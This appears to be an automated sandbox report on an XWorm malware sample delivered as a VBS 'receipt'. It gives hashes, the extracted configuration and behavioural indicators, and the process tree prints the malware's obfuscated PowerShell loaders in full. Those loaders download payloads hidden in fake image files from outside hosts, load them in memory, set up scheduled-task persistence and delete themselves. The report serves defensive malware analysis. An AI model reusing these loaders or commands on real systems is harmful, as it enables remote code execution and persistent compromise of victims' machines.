Analysis
-
max time kernel
142s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
05-04-2024 11:45
Static task
static1
Behavioral task
behavioral1
Sample
logo/receipt.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
logo/receipt.vbs
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
parcel_shipping_label.lnk
Resource
win7-20240215-en
Behavioral task
behavioral4
Sample
parcel_shipping_label.lnk
Resource
win10v2004-20231215-en
General
-
Target
logo/receipt.vbs
-
Size
4KB
-
MD5
22d736ac0bfacea4d23dbaf9412d329a
-
SHA1
b2990e0c9f9549b1f8cc3dceec47663b975cbb36
-
SHA256
c5a2fd9c057765f6eb2bde2cc86317b53d8418117c9e1362596e067b44ea7d04
-
SHA512
bfdd54f8e400e9c516cf5c73f1ba17b2a5c44fe9d14ada37efaff35c38d30c7849ad1dfb32a3d877742631a60c462832e079994de5fe65044a2941eaa0770904
-
SSDEEP
96:LQUUjcFSoSqUnPkPKOTK6yjbo+yHQUJ8fLGZ2k7:dYcFh5UsPKOTJcoLMw2k7
Malware Config
Extracted
xworm
5.0
UxOlPOZZNwNV9srk
-
install_file
USB.exe
-
pastebin_url
https://pastebin.com/raw/Dh8E7H3R
Extracted
xworm
3.1
-
Install_directory
%AppData%
-
install_file
USB.exe
-
pastebin_url
https://pastebin.com/raw/Dh8E7H3R
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/memory/64-35-0x0000000000400000-0x0000000000410000-memory.dmp family_xworm behavioral2/memory/4724-123-0x0000018D78100000-0x0000018D78116000-memory.dmp family_xworm -
Blocklisted process makes network request 5 IoCs
flow pid Process 3 4780 WScript.exe 6 4780 WScript.exe 11 4780 WScript.exe 21 1564 powershell.exe 24 1564 powershell.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation iwebbh.bat.exe Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation iwebbh.bat.exe Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation iwebbh.bat.exe -
Executes dropped EXE 3 IoCs
pid Process 3524 iwebbh.bat.exe 4724 iwebbh.bat.exe 2804 iwebbh.bat.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\iwebbh = "C:\\Users\\Admin\\AppData\\Roaming\\iwebbh.bat" iwebbh.bat.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 26 pastebin.com 27 pastebin.com 37 pastebin.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1564 set thread context of 64 1564 powershell.exe 97 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3364 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 21 IoCs
pid Process 868 powershell.exe 868 powershell.exe 1564 powershell.exe 1564 powershell.exe 64 AddInProcess32.exe 4272 powershell.exe 4272 powershell.exe 4272 powershell.exe 4272 powershell.exe 4724 iwebbh.bat.exe 4724 iwebbh.bat.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 2804 iwebbh.bat.exe 2804 iwebbh.bat.exe 2932 powershell.exe 2932 powershell.exe 2932 powershell.exe 2932 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 868 powershell.exe Token: SeDebugPrivilege 1564 powershell.exe Token: SeDebugPrivilege 64 AddInProcess32.exe Token: SeDebugPrivilege 4272 powershell.exe Token: SeDebugPrivilege 4724 iwebbh.bat.exe Token: SeDebugPrivilege 1672 powershell.exe Token: SeDebugPrivilege 2804 iwebbh.bat.exe Token: SeDebugPrivilege 2932 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 64 AddInProcess32.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 4780 wrote to memory of 868 4780 WScript.exe 89 PID 4780 wrote to memory of 868 4780 WScript.exe 89 PID 868 wrote to memory of 1564 868 powershell.exe 91 PID 868 wrote to memory of 1564 868 powershell.exe 91 PID 1564 wrote to memory of 64 1564 powershell.exe 97 PID 1564 wrote to memory of 64 1564 powershell.exe 97 PID 1564 wrote to memory of 64 1564 powershell.exe 97 PID 1564 wrote to memory of 64 1564 powershell.exe 97 PID 1564 wrote to memory of 64 1564 powershell.exe 97 PID 1564 wrote to memory of 64 1564 powershell.exe 97 PID 1564 wrote to memory of 64 1564 powershell.exe 97 PID 1564 wrote to memory of 64 1564 powershell.exe 97 PID 64 wrote to memory of 2688 64 AddInProcess32.exe 101 PID 64 wrote to memory of 2688 64 AddInProcess32.exe 101 PID 64 wrote to memory of 2688 64 AddInProcess32.exe 101 PID 2688 wrote to memory of 4324 2688 cmd.exe 103 PID 2688 wrote to memory of 4324 2688 cmd.exe 103 PID 2688 wrote to memory of 4324 2688 cmd.exe 103 PID 4324 wrote to memory of 3524 4324 cmd.exe 105 PID 4324 wrote to memory of 3524 4324 cmd.exe 105 PID 4324 wrote to memory of 3524 4324 cmd.exe 105 PID 2476 wrote to memory of 2872 2476 cmd.exe 113 PID 2476 wrote to memory of 2872 2476 cmd.exe 113 PID 2872 wrote to memory of 4724 2872 cmd.exe 115 PID 2872 wrote to memory of 4724 2872 cmd.exe 115 PID 4724 wrote to memory of 1672 4724 iwebbh.bat.exe 116 PID 4724 wrote to memory of 1672 4724 iwebbh.bat.exe 116 PID 2792 wrote to memory of 2424 2792 cmd.exe 120 PID 2792 wrote to memory of 2424 2792 cmd.exe 120 PID 2424 wrote to memory of 2804 2424 cmd.exe 122 PID 2424 wrote to memory of 2804 2424 cmd.exe 122 PID 2804 wrote to memory of 2932 2804 iwebbh.bat.exe 123 PID 2804 wrote to memory of 2932 2804 iwebbh.bat.exe 123
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\logo\receipt.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4780 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTre2DgTreDDgTreDgTreLwDgTrewDgTreDQDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre4DgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreEYDgTrecgBvDgTreG0DgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreUDgTreBSDgTreE8DgTreSgBFDgTreFQDgTreTwBBDgTreFUDgTreVDgTreBPDgTreE0DgTreQQBDDgTreEEDgTreTwDgTreuDgTreFYDgTreQgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreG0DgTreZQB0DgTreGgDgTrebwBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTreuDgTreEcDgTreZQB0DgTreE0DgTreZQB0DgTreGgDgTrebwBkDgTreCgDgTreJwBWDgTreEEDgTreSQDgTrenDgTreCkDgTreLgBJDgTreG4DgTredgBvDgTreGsDgTreZQDgTreoDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTresDgTreCDgTreDgTreWwBvDgTreGIDgTreagBlDgTreGMDgTredDgTreBbDgTreF0DgTreXQDgTregDgTreCgDgTreJwDgTremDgTreGUDgTreODgTreDgTreyDgTreDEDgTreYwBmDgTreDcDgTreNgBkDgTreGUDgTreYgBiDgTreDUDgTreYQDgTrezDgTreDYDgTreNwBiDgTreDQDgTreZDgTreDgTrewDgTreGMDgTreMQDgTrexDgTreGYDgTreNwDgTrewDgTreDIDgTreMDgTreDgTre4DgTreGIDgTreZgBjDgTreDYDgTreYwBiDgTreDQDgTreNDgTreDgTre5DgTreDYDgTreZQDgTre0DgTreDEDgTreODgTreBmDgTreDIDgTreYQDgTre4DgTreDcDgTreZDgTreDgTrezDgTreDMDgTreNDgTreDgTre3DgTreGMDgTreNgDgTre0DgTreDIDgTreNDgTreDgTre3DgTreDDgTreDgTreZQDgTre5DgTreGQDgTrePQBtDgTreGgDgTreJgDgTrewDgTreGUDgTreZDgTreDgTre0DgTreGMDgTreMDgTreDgTre2DgTreDYDgTrePQBzDgTreGkDgTreJgDgTrewDgTreGUDgTreMgBjDgTreGUDgTreMQDgTre2DgTreDYDgTrePQB4DgTreGUDgTrePwB0DgTreHgDgTredDgTreDgTreuDgTreGQDgTrebwBvDgTreGgDgTreLwDgTre4DgTreDcDgTreMDgTreDgTrewDgTreDkDgTreNDgTreDgTrezDgTreDYDgTreMgDgTrezDgTreDDgTreDgTreMQDgTre3DgTreDgDgTreNwDgTre0DgTreDIDgTreMgDgTrexDgTreC8DgTreOQDgTrezDgTreDgDgTreMwDgTrewDgTreDDgTreDgTreNQDgTre2DgTreDUDgTreNwDgTre5DgTreDIDgTreODgTreDgTrewDgTreDYDgTreMQDgTre4DgTreDEDgTreMQDgTrevDgTreHMDgTredDgTreBuDgTreGUDgTrebQBoDgTreGMDgTreYQB0DgTreHQDgTreYQDgTrevDgTreG0DgTrebwBjDgTreC4DgTrecDgTreBwDgTreGEDgTreZDgTreByDgTreG8DgTreYwBzDgTreGkDgTreZDgTreDgTreuDgTreG4DgTreZDgTreBjDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCwDgTreJwBBDgTreGQDgTreZDgTreBJDgTreG4DgTreUDgTreByDgTreG8DgTreYwBlDgTreHMDgTrecwDgTrezDgTreDIDgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:868 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&e821cf76debb5a367b4d0c11f70208bfc6cb4496e418f2a87d3347c642470e9d=mh&0ed4c066=si&0e2ce166=xe?txt.dooh/8700943623017874221/9383005657928061811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:64 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iwebbh.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\iwebbh.bat"6⤵
- Suspicious use of WriteProcessMemory
PID:4324 -
C:\Users\Admin\AppData\Local\Temp\iwebbh.bat.exe"C:\Users\Admin\AppData\Local\Temp\iwebbh.bat.exe" -w hidden -c $ZiYB='TWHQYraWHQYnsWHQYfoWHQYrmFiWHQYnalWHQYBloWHQYckWHQY'.Replace('WHQY', '');$TWWf='CreWHQYateWHQYDeWHQYcryWHQYptWHQYorWHQY'.Replace('WHQY', '');$JFEq='LoWHQYadWHQY'.Replace('WHQY', '');$PgsW='GetWHQYCuWHQYrWHQYreWHQYntWHQYPrWHQYoWHQYceWHQYssWHQY'.Replace('WHQY', '');$tNsL='LaWHQYstWHQY'.Replace('WHQY', '');$GjzR='MaiWHQYnWHQYModuWHQYleWHQY'.Replace('WHQY', '');$aRAn='SpWHQYlitWHQY'.Replace('WHQY', '');$TNHv='IWHQYnWHQYvokWHQYeWHQY'.Replace('WHQY', '');$QZWA='EntWHQYrWHQYyPoWHQYintWHQY'.Replace('WHQY', '');$vNAk='FroWHQYmBaWHQYsWHQYe6WHQY4SWHQYtriWHQYngWHQY'.Replace('WHQY', '');$UYdq='ReWHQYaWHQYdLiWHQYnWHQYeWHQYsWHQY'.Replace('WHQY', '');$JZFz='ChWHQYangWHQYeWHQYExtWHQYensiWHQYoWHQYnWHQY'.Replace('WHQY', '');function swdxJ($huXUQ){$dLULt=[System.Security.Cryptography.Aes]::Create();$dLULt.Mode=[System.Security.Cryptography.CipherMode]::CBC;$dLULt.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$dLULt.Key=[System.Convert]::$vNAk('g+qN2trIRo/tbHFrQCd/eQDgIirzmSlbfVKkYlD3YWc=');$dLULt.IV=[System.Convert]::$vNAk('eff0gny3xfxcI+yMk6XV2Q==');$lfKNS=$dLULt.$TWWf();$QwlmH=$lfKNS.$ZiYB($huXUQ,0,$huXUQ.Length);$lfKNS.Dispose();$dLULt.Dispose();$QwlmH;}function ktBmv($huXUQ){$NioEV=New-Object System.IO.MemoryStream(,$huXUQ);$xipLu=New-Object System.IO.MemoryStream;$BScFk=New-Object System.IO.Compression.GZipStream($NioEV,[IO.Compression.CompressionMode]::Decompress);$BScFk.CopyTo($xipLu);$BScFk.Dispose();$NioEV.Dispose();$xipLu.Dispose();$xipLu.ToArray();}$zaZHN=[System.Linq.Enumerable]::$tNsL([System.IO.File]::$UYdq([System.IO.Path]::$JZFz([System.Diagnostics.Process]::$PgsW().$GjzR.FileName, $null)));$GGCVp=$zaZHN.Substring(2).$aRAn(':');$GwZBd=ktBmv (swdxJ ([Convert]::$vNAk($GGCVp[0])));$gptFX=ktBmv (swdxJ ([Convert]::$vNAk($GGCVp[1])));[System.Reflection.Assembly]::$JFEq([byte[]]$gptFX).$QZWA.$TNHv($null,$null);[System.Reflection.Assembly]::$JFEq([byte[]]$GwZBd).$QZWA.$TNHv($null,$null);7⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
PID:3524 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3524);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4272
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "iwebbh" /tr "C:\Users\Admin\AppData\Roaming\iwebbh.bat"8⤵
- Creates scheduled task(s)
PID:3364
-
-
-
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\iwebbh.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2476 -
